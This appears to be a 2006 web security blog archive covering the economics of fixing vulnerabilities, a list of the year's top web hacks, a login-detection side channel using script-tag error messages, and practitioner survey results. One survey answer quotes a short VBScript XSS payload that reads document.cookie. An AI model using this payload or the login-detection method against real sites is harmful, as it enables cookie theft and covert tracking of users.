Thursday, December 28, 2006

Applying the formula

Sylvan von Stuppe published a pair of excellent posts speaking about how we as security practitioners can motivate "the business" to improve the current state of web application security. Sylvan adds to my earlier list of questions with something very insightful.

"Once flaws have been identified, what is my motivation to fix them? If you can't give me the likelihood of attack, and what I stand to lose by it being exploited, how many dollars should I invest to repairing it?"

As security practitioners, we continue to say how much the development environments need to learn to make secure software. I'd say there's another side to that coin - security practitioners need to be able to measure the impact of particular threats in terms of dollars so that we don't just reveal vulnerabilities and the threats that might exploit them, but what the business stands to lose of the vulnerability isn't fixed.

Very well stated and got me thinking about how this could be done. For some reason the movie Fight Club popped into my head with the scene about how Jack, as a automative manufacture recall coordinator, applied "the formula". Seemed like a fun way to go about it. :)

JACK (V.O.)
I'm a recall coordinator. My job is to apply the formula.

....

JACK (V.O.)

Take the number of vehicles in the field, (A), and multiply it by the probable rate of failure, (B), then multiply the result by the average out-of-court settlement, (C). A times B times C equals X...

JACK
If X is less than the cost of a recall, we don't do one.

BUSISNESS WOMAN

Are there a lot of these kinds of accidents?


JACK

Oh, you wouldn't believe.


BUSINESS WOMAN

... Which... car company do you work for?


JACK

A major one.


I know I know, I broke the first rule of Fight Club. Anyway, I have no idea how "real" this formula is or if its applied, but it seemed to make sense. I wondered if something similar could be applied to web application security. And if nothing else, an entertaining exercise.

Take the number of known vulnerabilities in a website, (A), and multiply it by the probability of malicious exploitation, (B), then multiply the result by the average average financial cost of handling a security incident, (C). A times B times C equals X...

If X is less than the cost fixing the vulnerabilities, we won't.

Sounds like it could work given you could be somewhat accurate in filling in the variables, which is the hard part. The thing is this process probably isn't a suitable task for an information security person. Maybe we need to seek the assistance of an economist of a probability theorist and see what they have to say.

moving forward: the knowns and unknowns

We know security of websites must improve, heck it can’t get much worse. One major challenge we’re facing is not everyone agrees on what needs to be done. For example, if someone were to ask a mailing list, “what do I need to do to secure my website?”, they’d likely receive 20 different answers and perhaps get asked just as many questions. Conversely, if the same question was asked about a PC, you’d probably get 3 similar answers and maybe a question about why your using Windows (*just kidding*). This inevitably leaves website owners in a state of confusion unsure of what to do. Maybe they’ll do nothing.

I think the reason behind the lack of consensus is due to void of data and/or a means to measure success. We’re essentially flying blind. Let’s rhetorically consider several questions people commonly ask:

“How do I find out how many websites I have?”
“What do they do and how *important* are they?”
“Who’s responsible for them?”

Digging into a single website….

“How large and complex is the code base?”
“What’s the rate of application code change?”

Narrowing down to vulnerabilities…

“What vulnerabilities do I have?”
“Who’s fault is it and how do I prioritize their remediation?”
“What do I do to protect myself in the meantime?”

Finally organizational changes…

“Which should I focus on, developer education or the use of a modern development framework?”
“Which testing process is better, white box or black box or glass box?”

Answering these questions is anything but simple, largely dependent on any number of factors, unknown to any single person, and varies from organization to organization. The point is an organization must be able to understand its current state of affairs. And we as an industry must be able measure if a particular strategy or solution is working and if so how well. This brings us to where I think we are today. Best-practices based upon conventional wisdom held over from other areas of information security, which do not apply here. A harsh reality.

To begin looking at things in fresh and new perspective, I find its helpful to line up the "knowns" and "unknowns" for a particular problem set. From there it’s easier to spot trends, relationships, inconsistencies, and areas that should yield immediate return from investigation.
  1. In what would normally be considered the largest, most popular, and “secure” websites, it’s found the vast majority have serious vulnerabilities. We have no idea about the security of the mid and lower end websites which are typically not assessed.
  2. Those typically in charge of information security do not have the same level of control over the safety of their websites as they do at the network infrastructure level. Consequently, the responsibility of website security is unassigned or rests among several constituencies.
  3. Attacks targeting the web application layer are growing year over year in number, sophistication, and maliciousness. Real would visibility into these attacks are extremely limited.
  4. Firewalls, patching, configuration, transmission/database encryption, and strong authentication solutions do not protect against the majority of web applications vulnerabilities.
  5. All software has defects and in turn will have vulnerabilities. Security enhancements provided by modern development frameworks help to prevent vulnerabilities, though will not eliminate them altogether. Measured benefit is unknown.
  6. Change rate of commerce web applications is relatively rapid updated with incremental revisions. Traditional PC or enterprise software tends to be slower with larger versioned builds. Web applications tend to have a steady and faster flow of vulnerabilities.
  7. Developer education in software security and implementing security testing inside the quality assurance phase reduces the number of vulnerabilities, but will not eliminate them. See #5. The overall expected reduction of vulnerabilities as a result is unknown.
  8. It’s impossible to find all vulnerabilities through automation, which requires a significant amount of experienced human time to complete thorough security testing. How much time is required and how close the process will come to finding everything is debatable.
  9. Web application security is a new and complex subject for which there is a limited population of experienced practitioners relative to the amount of workload.
  10. Web browser security is largely and fundamentally broken leaving unable to protect users against modern attacks. The situation hasn’t significantly improved with Firefox 2.0 or Internet Explorer 7.0. and it’s unclear it future releases will attempt to address the problem.
What does this tell us? A lot of things actually. First and foremost, there is a lot of work to do *like we didn’t know that already*. Here are a couple of my observations:
  • Solutions must come from areas other than "fixing" the code
  • We need to invest resources into measuring ROI from various solutions and best-practices
  • Create training and perhaps certification programs for web application security professionals
  • We need wider visibility into the real-world hacks
  • We need to develop and implement new and innovated security designs for modern web browsers
I’d enjoy hearing from others about additional “knows” and “unknowns” and what they can derive from them.

Tuesday, December 26, 2006

The future of web application vulnerability assessment is about scale

Recently Alan Shimel (StillSecure) went out on a tiny twig and said, “vulnerability assessment (VA) is dead”. Of course Alan’s speaking about network security not web applications. His remarks are about VA's convergence with NAC’s. Fair enough. When I spoke with him he said, “Actually VA for web apps is one of the few bright spots in the VA space these days.” I'd like to think so. :) This topic is always on my mind since this is exactly what my company does. “What is the future of web application vulnerability assessment?” is a question that doesn’t get asked a lot. Personally I think we’re at the point where network VA was a few years ago, solving the challenge of scaling.

Where are we now?
  • 105 million sites are on the Web with 4 million new ones each month.
  • Perhaps hundreds (?) of thousands of websites collect or distribute personal information, financial and healthcare data, credit card numbers, intellectual property, trade secrets, etc.
  • Web application issues top every major Top-X vulnerability list.
  • 8 out 10 websites are full of holes and most of the attacks are targeting the web application layer.
  • Assessments should be performed after each code change or "major" release and require about a week or two of human-time to complete.
We need to get our arms around the problem.

Analyzing the scope using some assumptions:
  • 500,000 “important” websites (roughly 1/2 of 1% of the total population)
  • Assessments 2-times a year per website. (Vary on change rate)
  • An expert can perform 40 assessments per year with base salary of $100,000 (US).
  • Retail cost per assessment $5,000 (US). (Normally higher ranging between $8,000 - $15,000)
Granted my numbers could be off and may vary a great deal from enterprise to enterprise. However, this exercise helps estimate the relative needs of the market. Let's see what kind of resources we need if we're trying to assess all these websites for vulnerabilities twice per year.

Today we'd need:
  • 1 million total vulnerability assessments
  • 25,000 experienced experts in web application VA
  • $2,500,000,000 (US) in salary for web application experts
  • $5,000,000,000 (US) retail assessment cost
Even though the assumptions were way the conservative side, it’s immediately apparent that this scenario is completely fictitious. There are probably only 3,000 experts (a guess) in the world qualified to perform assessments relative to the 25,000 required. And much as I’d wish they would, enterprises are simply not going to spend multi-billions on web application security in 2007.

Of course as the awareness of web application security builds the numbers will climb, but for now we have to face facts. And the fact is unless we can vastly improve the web application VA process, most websites will not be assessed for security and remain insecure. That’s what’s going on today. And that’s why I’m saying the future of web application vulnerability assessment is about scale.

While we certainly can’t reduce the number of “important” websites, can reduce the number of man-hours and expertise required to perform an assessment using technology and a modern processes. Modern assessment processes need to be highly streamlined, repeatable, thousands running concurrently and performable by less than top-tier webappsec experts. This is what it truly means to “scale”.

How much improve can be made near term is a subject of much debate, but we’re working on it. For fun, let’s try a few more guesses at how certain efficiencies will help.

Future improvements:
  • 500,000 “important” websites (roughly 1/2 of 1% of the total population)
  • Assessments 2-times a year per website. (Vary on change rate)
  • An expert can perform 40 200 assessments per year with base salary of $100,000 $80,000 (US).
  • Retail cost per assessment $5,000 $2,000 (US).
Adjusted requirements:
  • 1 million total vulnerability assessments
  • 5,000 experienced experts in web application VA
  • $2,000,000,000 (US) in salary for web application experts
  • $400,000,000 (US) retail assessment cost
These numbers are much more palatable in the grand scheme of things and gives us our benchmarks for where technology and process must bring us to. How long will it take to get there is anyone's guess.

Friday, December 22, 2006

Secure Code Through Frameworks

pdp (architect) recently invited me to guest blog on gnucitizen. I'd never done something like that before, so I figured it'd be a fun first. Here goes...

Secure Code Through Frameworks
105 million sites make their home on the Web - 4 million more move in each month. That’s a staggering number to think about, and as we well know, the vast majority of websites (I say 8 in 10) have serious security issues. Industry discussions go round and round about what should be done. We talk about secure coding practices, training, compliance, assessment, source-code audits, and the like. What’s going to work? Then I read something Robert Auger posted, the lack of security enabled frameworks is why we’re vulnerable, touching on an area I’ve thought a lot about recently.


Friday, December 15, 2006

Top 10 Web Hacks of 2006

Update: RSnake provides his summary of the Top 10. Insightful as usual.

Attacks always get better, never worse. That’s what probably what I’ll remember most about 2006. What a year it’s been in web hacking! There’s never been such a big leap forward in the industry and frankly it’s really hard to keep up. My favorite quote came today from Kryan:

"The last quarter of this year, RSnake and Jeremiah pretty much destroyed any security we thought we had left. Including the "I'll just browse without javascript" mantra. Could you really call that browsing anyways?"

To look back on what’s been discovered RSnake, Robert Auger, and myself collected as many of the new 2006 web hacks as we could find. We’re using the term "hacks" loosely to describe some of the more creative, useful, and interesting techniques/discoveries/compromises. There were about 60 to choose from making the selection process REALLY difficult. After much email deliberation we believe we created a solid Top 10. Below you’ll find the entire list in no particular order. Enjoy!


Top 10

  1. Web Browser Intranet Hacking / Port Scanning - (with JavaScript and with HTML-only and the improved model)
  2. Internet Explorer 7 "mhtml:" Redirection Information Disclosure
  3. Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
  4. Web Browser History Stealing - (with CSS, evil marketing, JS login-detection, and authenticated images)
  5. Backdooring Media Files (QuickTime, Flash, PDF, Images, Word [2], and MP3's)
  6. Forging HTTP request headers with Flash
  7. Exponential XSS
  8. Encoding Filter Bypass (UTF-7, Variable Width, US-ASCII)
  9. Web Worms - (AdultSpace, MySpace, Xanga)
  10. Hacking RSS Feeds

Honorable Mention

Full List
The Attack of the TINY URLs
Backdooring MP3 Files
Backdooring QuickTime Movies
CSS history hacking with evil marketing
I know where you've been
Stealing Search Engine Queries with JavaScript
Hacking RSS Feeds
MX Injection : Capturing and Exploiting Hidden Mail Servers
Blind web server fingerprinting
JavaScript Port Scanning
CSRF with MS Word
Backdooring PDF Files
Exponential XSS Attacks
Malformed URL in Image Tag Fingerprints Internet Explorer
JavaScript Portscanning and bypassing HTTP Auth
Bruteforcing HTTP Auth in Firefox with JavaScript
Bypassing Mozilla Port Blocking
How to defeat digg.com
A story that diggs itself
Expect Header Injection Via Flash
Forging HTTP request headers with Flash
Cross Domain Leakage With Image Size
Enumerating Through User Accounts
Widespread XSS for Google Search Appliance
Detecting States of Authentication With Protected Images
XSS Fragmentation Attacks
Poking new holes with Flash Crossdomain Policy Files
Google Indexes XSS
XML Intranet Port Scanning
IMAP Vulnerable to XSS
Detecting Privoxy Users and Circumventing It
Using CSS to De-Anonymize
Response Splitting Filter Evasion
CSS History Stealing Acts As Cookie
Detecting FireFox Extentions
Stealing User Information Via Automatic Form Filling
Circumventing DNS Pinning for XSS
Netflix.com XSRF vuln
Browser Port Scanning without JavaScript
Widespread XSS for Google Search Appliance
Bypassing Filters With Encoding
Variable Width Encoding
Network Scanning with HTTP without JavaScript
AT&T Hack Highlights Web Site Vulnerabilities
How to get linked from Slashdot
F5 and Acunetix XSS disclosure
Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
Google plugs phishing hole
Nikon magazine hit with security breach
Governator Hack
Metaverse breached: Second Life customer database hacked
HostGator: cPanel Security Hole Exploited in Mass Hack
I know what you've got (Firefox Extensions)
ABC News (AU) XSS linking the reporter to Al Qaeda
Account Hijackings Force LiveJournal Changes
Xanga Hit By Script Worm
Advanced Web Attack Techniques using GMail
PayPal Security Flaw allows Identity Theft
Internet Explorer 7 "mhtml:" Redirection Information Disclosure
Bypassing of web filters by using ASCII
Selecting Encoding Methods For XSS Filter Evasion
Adultspace XSS Worm
Anonymizing RFI Attacks Through Google
Google Hacks On Your Behalf
Google Dorks Strike Again

Thursday, December 14, 2006

I know if you're logged-in, anywhere

Update: Chris Shiflett posted a "login-check" for Amazon.

The CSS History hack is a well-known brute force way to uncover where a victim user has traveled. Great Firefox extensions like SafeHistory are helping protect against this simple hack, but the cat and mouse game continues. Despite this tool, I’ve found a new way to tell where the user has been AND also if they are “logged-in”. People are frequently and persistently logged-in to popular websites. Knowing which websites can also be extremely helpful to improving the success rate of CSRF or Exponential XSS attacks as well as other nefarious information gathering activities.

The technique uses a similar method to JavaScript Port Scanning by matching errors from the JavaScript console. Many websites requiring login have URL’s that return different HTML content depending on if you logged-in or not. For instance, the “Account Manager” web page can only be accessed if you’re properly authenticated. If these URL’s are dynamically loaded into a <* script src=””> tag, they will cause the JS Console to error differently because the response is HTML, not JS. The type of error and line number can be pattern matched.

Using Gmail as an example, <* script src=” http://mail.google.com/mail/”>

If you are logged-in…




If you are NOT logged-in…



I mapped the error messages from a few popular websites and made some PoC code.
Firefox Only! (1.5 – 2.0) tested on OS X and WinXP. I don’t want to hear it about IE and Opera. :)

See the Proof-of-Concept
thanks to RSnake for hosting

Wednesday, December 13, 2006

Looking back at my predictions for 2006

First, lets look at how I did for 2006.

Research in 2006
1) I think their is going to be a lot of research, on the white hat and black hat side, in the area of web- based worms. Lots of creating and trading of JavaScript exploit code once an XSS issue is found.

Right on the money. Of course this might have been a self-fulfilling prophecy. :) Those are the best kind.

Commercial landscape in 2006
Personally I think compliance, specifically PCI, is going to be a big driver to improve web application security.

Blech, way off. PCI is a good standard with decent web application security components, but the enforcement of validation of compliance leaves something to be desired. When network scanning vendors can meet the minimum webappsec criteria with only the most rudimentary checks, then clearly there is improvement required. Checkbox != security. Maybe PCI will be a real driver by 2008. Time will tell.

To meet the requirements, I expect vendors will combine various types of vulnerability assessment products through innovation or acquisition. Current product/service offerings separate network, cgi, and web application assessment layers. Some combine 2, but not all three.


Off again yet again. I stil think this will happen, just don't know exactly when. I thought it would have taken place already.

To pass PCI quickly, we'll see people looking for simple solutions or hacks to clean up their vulnerabilities. Not everyone has the resources available to fix their web app code the right way. As a result, I expect new web server add-ons (or WAF's) and configuration set-ups will be employed as band-aids to prevent the identification of vulnerabilities. This is create an interesting challenge for the industry.

Let's call this a 50/50, I was correct about a huge increase in web application firewall deployments in the market led by ModSecurity and other commercial players. Way more WAF's on the Web than there were in 2004 and 2005. However, this didn't have anything to do with meeting PCI or a band-aid approach as I guessted. Most deployments I've seen have been towards defense-in-depth, bravo, but I was wrong in the prediction. :)

Then a few other predictions:
* a variety of different product/service standards

Nope. Wrong.

* certifications web application security professionals

Wrong again!

* other industries begin implementing PCI-like security standards

Sheesh, way off.

I'm no Nostradamus thats for sure.

Friday, December 08, 2006

Business Logic Flaws and Yahoo Games

Compelling real-world examples of business logic flaws in web applications are hard to come by. Most of the time we can't talk about specific instances because they’re typically unique to a company and protected under NDA. So when I read the editors article in CSO magazine (A Nation of Cheaters?) describing his experience with a logic flaw in the Yahoo Games ladders, I was immediately interested. Specifically because Yahoo was my previous employer and I was personally involved with situation described.

"A few years back, Yahoo Games instituted an online chess ladder. A ladder system essentially ranks all the players from top to bottom, and you move up by beating people ranked higher on the ladder. Losing (or not playing) slowly lowers your ranking.

I'm a decent player—I won the state championship of Kentucky in my salad days—but couldn't begin to approach the top of Yahoo's ladder. But guess what? The people at the top weren't playing chess at all!

They were cheaters, a closed circle of players passing the crown around by systematically losing one-move games to each other. Player No. 2 challenges Player No. 1, makes one move to start the game, and then Player No. 1 resigns the game and they switch rankings on the ladder. "

This is what we call Abuse of Functionality, "an attack technique that uses a web site's own features and functionality to consume, defraud, or circumvents access controls mechanisms." Most of the time we can't find these issues by scanning, we have to find them by hand, or from customer support when they receive hundreds of calls from pissed-off users because they can't improve their chess rank. There is more to this hack.

There are literally thousands of people (or more) with an amazing about of free time to do the most mundane tasks for the most inane rewards. “Cheating” players would code purpose built programs to bot 100’s of chess games 24x7 simultaneously. They’d sit up late into the evening because every so often the ladder ranks would be reset, and when they did, they’d snatch the top spots. And once they owned a block of the top spots they’d only play within their controlled accounts to rise slowly in ranks. The way the ladder logic worked, “legit” ranked players must play against other equally or higher rank players, and since cheaters wouldn’t play against them, legit players would drop in rank.

All that just to be at the top of the Yahoo Chess games ladder. No monetary reward, no praise, no nothing. Makes you think where else this is going on doesn’t it?

Thursday, December 07, 2006

Ryan Barnett enters the Blogosphere

Ryan Barnett, author of Preventing Web Attacks with Apache, is Breach Security's new Director of Application Security Training. If you recall Breach acquired ModSecurity earlier this year and is a WAF product vendor. Ryan, a long time friend, is a master of web application defensive strategies and techniques. In a real world sense, he knows what it takes to keep a website from getting hacked. He's finally entered the blogging realm and it'll be interesting to see what he has to say over 2007.

Wednesday, December 06, 2006

Web Application Security Professionals Survey (Dec. 2006)

Update 2: It looks like our little survey here is reaching some critical mass. Kelly Jackson Higgins from Dark Reading posted 'Not Much Resistance at the Door' covering the results. During the article one of the areas we haven't asked questions about came up, intranets:

"The scary unknown is intranet Website vulnerability, however, which the survey did not address. "There are no good metrics for how many intranet Websites there are, or how vulnerable they are. That's a big unknown in the industry," Grossman says. "It's a whole other world inside the firewall."

Update
: Once again a great survey turn out. A total of 63 respondents. Thank you everyone whom responded and those who helped me out with the questions. We didn't reach my 100 prediction, but that's OK because I'm not very good at those anyway. :) We'll try to get there in January. The problem is its getting difficult to manage this by email, I'll have to figure out some way to remedy that. The data collected certainly did not disappoint and some interesting things bubbled to the top.

My Observations
Good representation from both security vendors and enterprise professionals. Most of which have several years of experience, a significant percentage of their time dedicated to web application security, and performed 1 - 40 assessments in 2006. An experienced bunch I’d say.

About half of organizations have vulnerability assessments performed see security measurement as the primary security driver and about a quarter say compliance. I would have figured measurement would have scored higher and compliance lower. Maybe we’re seeing a shift in the industry.

The vast majority of webappsec professionals believe assessments should be performed after each code change or "major" release, takes a week or two to complete, and rarely encounter multi-factor authentication or web application firewalls. About half of people using commercial scanners say scanner complete about half or less of their workload. The other half of people who don’t say assessment are faster to do by hand, have too many false positives, or too expensive. There is much more to talk about here, but that’ll come in another post.

Question 12a on disclosure yielded some interesting results. There majority of people are evenly split between “responsible” and “non” disclosure. Think about that. Just as many as are disclosing as those who don’t because there is inherent risk. As I’ve said before, discovery is going to be a big issue moving forward. We’re going to loose the check and balance we’ve relied upon with traditional commercial and open source software.

Description
Its been a month already since the last survey. In November we got a great turn out doubling the response from October. Maybe this time we'll reach 100 respondents. Anyway...

If you perform web application vulnerability assessments, whether personally or professionally, this survey is for you. 15 multiple choice questions designed to help us understand more about the industry in which we work. Most of us in InfoSec dislike taking surveys, however the more people who respond the more informative the data will be. So far the information collected has been really popular and insightful. And a lot of people helped out with the formation of these questions.

================================================================
Guidelines
  • Open to those who perform web application vulnerability assessments/pen-tests
  • Email your answers to jeremiah __at__ whitehatsec.com
  • To curb fake submissions please use your real name, preferably from your employers domain.
  • Submissions must be received by December 14.
Notice: Results based on data collected will be published.

Privacy: Absolutely no names or contact information will be released to anyone. Though feel free to self publish your answers (blogs).
================================================================

Questions

1) What type of organization do you work for?

a) Security vendor / consultant (63%)

b) Enterprise (23%)
e) Other (please specify) (10%)
c) Government (5%)
d) Educational institution (0%)




2) What portion of your job is dedicated to web application security (as opposed to development, general security, incident response, etc)?



a) All or almost all (53%)
b) About half (28%)
c) Some (20%)
d) None (0%)




3) How many years have you been working in the web application security field?


c) 2 - 4 (33%)
e) 6+ (25%)
d) 4 - 6 (20%)
b) 1 - 2 (13%)
a) Less than a year (10%)




4) In your experience, what's the primary reason why organizations have web application vulnerability assessments performed?


a) To measure how secure they are, or not (53%)
b) Industry regulation and/or compliance (25%)
c) Customers or partners ask for independent third-party validation (10%)
e) Other (please specify) (10%)
d) No idea (3%)




5) How often should web applications be assessed for vulnerabilities?


a) After every code change (65%)
e) Other (please specify) (20%) - Answers mostly revolved around "major" releases.
c) Quarterly (10%)
b) Annually (5%)
d) Before the auditors arrive (0%)




6) How many web application vulnerability assessments have you personally conducted this year (2006)?


b) 1 - 20 (50%)
c) 20 - 40 (23%)
d) 40 - 60 (13%)
e) 60+ (10%)
a) None (5%)




7) How many man-hours does it take you to complete a web application vulnerability assessment on the average website?


c) 20 - 40 (50%)
b) 0 - 20 (23%)
d) 60 - 80 (23%)
e) 80+ (5%)
a) None (0%)




Please ONLY answer ONE of the two following questions (#8 and #9)

Commercial Vulnerability Scanners: (Acunetix, Cenzic, Fortify, NTOBJECTives, Ounce Labs, Secure Software, SPI Dynamic, Watchfire, etc.)

8) If commercial vulnerability scanners ARE part of your tool chest, how much of your preferred assessment methodology do they complete? 36 respondents (57%)

c) About half (58%)
d) A little bit (33%)
e) Not much (4%)
b) Most of it (4%)
a) All or almost all (0%)




9) If commercial vulnerability scanners are NOT part of your tool chest, why not?
27 respondents (43%)

d) Some combination of a, b, and c (61%)
a) Too many false positives (11%)
c) Faster to do assessments by hand (11%)
b) Too expensive (6%)
e) Haven't tried any of them (6%)
f) Other (please specify) (6%)




10) How often do you encounter web application firewalls blocking your attacks during a vulnerability assessment?


d) Never, or almost never (73%)
c) Sometimes (10%)
e) Hard to tell (10%)
b) About half of the time (5%)
a) A lot (3%)





11) While performing web application vulnerability assessment, how often do you encounter websites requiring multi-factor authentication?
(Hardware token, software token, secret questions, one-time passwords, etc.)


d) Never, or almost never (50%)
c) Sometimes (35%)
b) About half of the time (8%)
a) A lot (5%)
e) Hard to tell (3%)



12a) If you find a vulnerability in a website you don't have written permission to test, what do you do with the data MOST of the time?


b) Inform the website administrators (responsible disclosure) (36%)
c) Keep it to yourself, no sense risking jail or lawsuits (36%)
e) Other (please specify) (18%)
a) Post it sla.ckers.org (full-disclosure) (8%)
d) Sell it (3%)

Daniel Cuthbert: "WALK AWAY! spending 1 year fighting the british government over this exact thing made me realise this lone cowboy approach will never work :0)"


12b) How has the security of the average website changed this year (2006) vs. last year (2005)?


c) Same (50%)
b) Slightly more secure (28%)
d) Worse (20%)
a) Way more secure (3%)
e) No idea (0%)





13) What do you think of RSnake's XSS cheat sheet.

http://ha.ckers.org/xss.html


b) I like it (55%)
a) It rocks! (28%)
c) It has the basics, but there are more options (13%)
e) Never heard of it (5%)
d) Lame (0%)




14) Do you surf the Web with JavaScript turned off?



c) No (38%)
b) Sometimes (33%)
a) Yes (18%)
d) Only when clicking on links from Jeremiah (10%)




15) What operating system are you using to answer this question?


a) Windows (68%)
b) OS X (15%)
c) Linux (15%)
d) BSD (3%)
e) Other (please specify) (0%)





BONUS


16) The most valuable web application security tip/trick/idea/concept/hack/etc you learned this year (2006)? List just 1 thing. *Full list will be published*

When forms convert lower case to uppercase, use VBScript to test for XSS
since it is not case sensitive like JavaScript <* script type=text/vbscript>alert(DOCUMENT.COOKIE)<* /script>

When spidering a website use your standard USER AGENT, then crawl it agai
Using JavaScript to other than just stealing cookies :-P

The research and disclosure being done on sla.ckers.org and gnucitizen.org.
JavaScript Malware Intranet Hacking

I don't remember.

combination of XSS and XHR. (My next PoC will show you why)

Javascript Scanning

Blind SQL injection in MSSQL and MySQL, complex XSS injection (using the
great http://ha.ckers.org/xss.html)

I can tell you, but then I will have to sign you on an NDA :-)

XSS Shell

XSRF

mhtml: vulnerability - complete read access to the Internet on Internet
Explorer. Scary!

Learned none.

This might not be web app. related until after Vista is released (yeah, right).
I found interesting the concept of how to discover whether Visual Studio binaries have been /GS compiled; Used to mitigate local stack variable overflows.

Sorry, I'm restricted from saying. :/ I guess my best/most valuable tip that I use every time is don't become dependent on any one tip/trick/idea/concept/hack. :)

What cross domain restrictions? The web security model was completely smashed up this year and I don't pretend to claim to be smart enough to fix it. But what we got isn't working the way we thought it did.

I've found some new tools to try out, such as TamperIE, which I picked up from the "Hacking Web Applications Exposed 2nd Edition" book I purchased, and I believe you wrote the foreword. Plus I have to hand it to RSnake, id, maluc and the other people on sla.ckers.org, they just keep coming up with new attack vectors. Their disclosures can be a little frightening. As you said in the foreword, sometimes we just want to bury our head in the sand because we know most of the sites out there have vulnerabilities.

CSRF (Just after I tested a bloody forum too!)

impoving my XSS knowledge with the awesome help of ha.ckers.org and sla.ckers.org

Learning more about web servicves, SOAP, XML, etc.

That demonstrating issues to a vendor/customer is much less effective
than expressing the business liabilty and risk expressed in $s :-)

Fully understanding AJAX, which is important, even if all I learned was that it wasn't as big a deal as I expected it to be (from a security standpoint it is a much bigger deal from developer and user viewpoints).

There is nothing new under the sun. People still do dumb things.

XSS + Ajax avoids the same-domain security sandbox.

Bypassing filtering mechanims by UTF-16 encoding URLs even when there's no need to

Using POST content as a query string in most cases won't effect the way the receiving application reacts. Attacks are more portable and easier to demonstrate in link format.

Implications of Flash 9 crossdomain.xml, including flaws in the implementation and severe lack of best practice standards. The floodgates may be open on client-side code with cross-domain privileges (Quicktime, etc.), but it's good to see a misstep at least happening in the right direction.

This is my statement for the web application security year 2006:
Everyone can find a XSS vulnerability but fortunately only a few people can imagine what this really means.

Automating viewstate injection. Maybe I'll release some notes about it.

Nothing can replace experience!

session riding

XSS

Watch out for that stupid UTF-7 encoding.

Search myspace for answers to secret questions :)

Intranet IP scanning really opened up my thinking of what XSS could be used to accomplish.

Sunday, December 03, 2006

Followup: Myth-Busting AJAX (In)-Security

I’ve gotten an overwhelming response to my Myth-Busting AJAX (In)Security article, even a nice slashdotting to go with it. The vast majority of the feedback was positive, some negative, others said “you make a good point, but…”. Though one blog post compared me Donald Rumsfeld. Now come on, that’s the plain mean! :) Anyway, this subject has been on my mind and apparently many others since Black Hat (USA) 2006. There needed to be another perspective voiced since not everyone agreed. So now people have a more complete set of viewpoints to consider and can make up their own minds. That's the important thing.

Anyway, as RSnake pointed out it’s been a busy week with a ton of new tricks posted. Maybe someone is going to starting combining these into something better. JavaScript Malware continues to evolve.

Thursday, November 30, 2006

Myth-Busting AJAX (In)-Security

In similar fashion to my buffer overflows article, I set my sights on Myth-Busting AJAX (In)-Security.

"The hype surrounding AJAX and security risks is hard to miss. Supposedly, this hot new technology responsible for compelling web-based applications like Gmail and Google Maps harbors a dark secret that opens the door to malicious hackers. Not exactly true. Even the most experienced Web application developers and security experts have a difficult time cutting through the buzzword banter to find the facts. And, the fact is most websites are insecure, but AJAX is not the culprit. Although AJAX does not make websites any less secure, it’s important to understand what does." read more...

Wednesday, November 29, 2006

Do we trust client-side security?

Many respected experts prior to me, including Bruce Schneier, have explained the faults of trusting client-side software. Not trusting the client has been widely accepted for a long time. And in kind I’ve repeated the mantra “never ever ever ever trust the client (or user-supplied content)” many times when it comes to web application security. Then I found myself reading one of RSnake’s posts and something he wrote caused me think about client-side security in a new way. It occurred to me that maybe we’re wrong. Maybe we already do trust the client, or in our case here the web browser. And maybe we have no choice but to continue doing so.

RSnake:
"I guess we have pretty much completely broken the same domain policies of yesterday. If I can scan your Intranet application from an HTML page without JavaScript or Java or any DHTML content whatsoever I think it’s time to start revisiting the entire DOM security model. That might just be my opinion but come on. What else do we have to do to prove it’s not working?"

He’s right of course. In the past 18 months it seems everything web browser related has been hacked. The same-origin policy, cookie security policy, history protection, the intranet boundary, extension models, flash security, location bar trust, and other sensitive areas have all been exposed. Web security models are completely broken and heck it’s spooky to even click on links these days. If we didn’t/don’t rely on client-side (browser) security, none of these discoveries would have mattered and none of us would have cared. But we do! Why is that?

You see when a user logs-in to a website, the first thing they must have is a reasonable assurance that the web page their visiting is from whom it claims to be. It could easily be a phishing site. Without a visually trustable location bar, SSL/TLS lock symbol, or HTML hyperlink display the user could be tricked into handing over their username/password to an attacker. Which of course could in-turn be used to illegally access our websites. Website security depends on the user not being *easily* tricked, but this does happen hundreds or maybe thousands of times a day.

This moves us to transport security. We don’t want sensitive data compromised by an attacker sniffing the web-browser-web server connection. If for some reason the browser has a faulty implementation of SSL/TLS (it happens) the crypto can be cracked and any sensitive data our website collects could fall into the wrong hands. Our website may remain safe and sound, but the data isn’t and that’s really the whole idea. Websites are relying on the browser to have a solid SSL/TLS implementation otherwise back to plaintext we go.

In exchange for a correct username/password combination the user’s browser receives for a cookie storing their session ID. The browser is the protector of this important key because if it’s stolen, then likely the user account and their data go with it. The website is trusting that the same-origin and cookie security policies imposed by the browser will keep the session ID (cookies) safe. But anyone familiar with XSS, using some JavaScript and Flash Malware, know that is hardly the case. And besides browser vulnerabilities routinely exposed this information through exploits. No joy here.

Another example is websites rely on web browsers to safeguard history/cache/bookmarks/passwords and everything else containing sensitive information or granting access to it. And as we well know, all of these areas are again routinely exposed through browser vulnerability exploits or clever JavaScript Malware hacks. Inside the browser walls is everything an attacker needs to hack our websites. Websites become highly dependent on web browsers keeping this data safe. Unfortunately they rarely do.

So maybe we are already trusting client-side (web browser) security. And with the web security models being set-up the way they are, we probably have to keep doing so for years to come.

Web Application Security Risk Report

Update 2: More coverage by Larry Greenemeier of InformationWeek, E-Tailers Leaving Money On The Table Thanks To Weak Web Sites.

Update
: Kelly Jackson Higgins, from Dark Reading, posted some quality coverage in Where the Bugs Are.

It’s been busy morning. I presented two popular webinars on "First Look at New Web Application Security Statistics - The Top 10 Web Application Vulnerabilities and their Impact on the Enterprise" [slides]. We've been offering the WhiteHat Sentinel Service for several years and in that time we've performed thousands of assessments on real-world websites. As a result we’ve collected a huge database of custom web application vulnerabilities, which to the best of my knowledge is the largest anywhere. Starting January 2007 we’ll be releasing a Web Application Security Report containing statistics derived from that data. Instead of waiting the two months, we’re figured we’d release some statistics early as a taste of things to come:

"Web applications are now the top target for malicious attacks. Why? Firstly, 8 out of 10 websites have serious vulnerabilities making them easy targets for criminals seeking to cash in on cyber crime. Secondly, enterprises that want to reduce the risk of financial losses, brand damage, theft of intellectual property, legal liability, among others, are often unaware that these web application vulnerabilities exist, their possible business impact, and how they are best prevented. Currently, this lack of knowledge limits visibility into an enterprise’s actual security posture. In an effort to deliver actionable information, and raise awareness of actual web application threats, WhiteHat Security is introducing the Web Application Security Risk Report, published quarterly beginning in January 2007."

Webinar slides and the full report [registration required] are available for download.

